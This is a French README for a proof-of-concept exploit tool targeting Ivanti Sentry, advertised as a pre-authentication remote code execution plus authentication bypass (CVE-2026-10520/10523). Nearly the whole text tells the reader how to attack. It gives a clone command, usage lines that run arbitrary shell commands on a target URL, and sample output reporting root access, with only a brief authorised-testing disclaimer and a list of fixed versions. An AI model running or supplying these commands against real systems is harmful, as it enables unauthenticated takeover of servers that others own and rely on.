
CVE-2026-10520
Exécution de code à distance sans authentification + Contournement de l'authentification
Auteur : Ashraf Zaryouh "0xBlackash"
Deux vulnérabilités critiques affectant Ivanti Sentry (anciennement MobileIron Sentry) :
Ces failles permettent à des attaquants non authentifiés de compromettre entièrement le système.
python3 CVE-2026-10520.py --url <CIBLE> --cmd <COMMANDE>
# Utilisation de base
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"
# Mode verbeux
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v
# Avec proxy
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080
# Vérifier le noyau
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"
git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py
Lorsque la cible est vulnérable, vous verrez :
██████╗ ██╗ ██╗██████╗ ██╗ █████╗ ██████╗██╗ ██╗ █████╗ ███████╗██╗ ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║ ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║ ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║ ███████║██║ █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║ ██╔══██║██║ ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║ ██║╚██████╗██║ ██╗██║ ██║███████║██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
CVE-2026-10520 & CVE-2026-10523 PoC Exploit
Ivanti Sentry Pre-Auth RCE + Auth Bypass
Author: Ashraf Zaryouh "0xBlackash"
GitHub: https://github.com/0xBlackash
[+] Target is VULNERABLE!
Command Output:
uid=0(root) gid=0(root) groups=0(root)
Cet outil est destiné uniquement à des tests de sécurité éducatifs et autorisés.
L'utilisation non autorisée sur des systèmes dont vous n'êtes pas propriétaire est illégale.
L'auteur n'assume aucune responsabilité en cas d'utilisation abusive.
Corrigé dans : 10.5.2 / 10.6.2 / 10.7.1
Fait avec ❤️ par Ashraf Zaryouh "0xBlackash"
Mettez une étoile au dépôt si vous l'avez trouvé utile ! ⭐
| Argument | Description | Requis |
|---|
--url | URL cible (ex. https://cible:8443) | Oui |
--cmd | Commande à exécuter | Oui |
-v, --verbose | Activer le mode verbeux | Non |
--proxy | Proxy HTTP (hôte:port) | Non |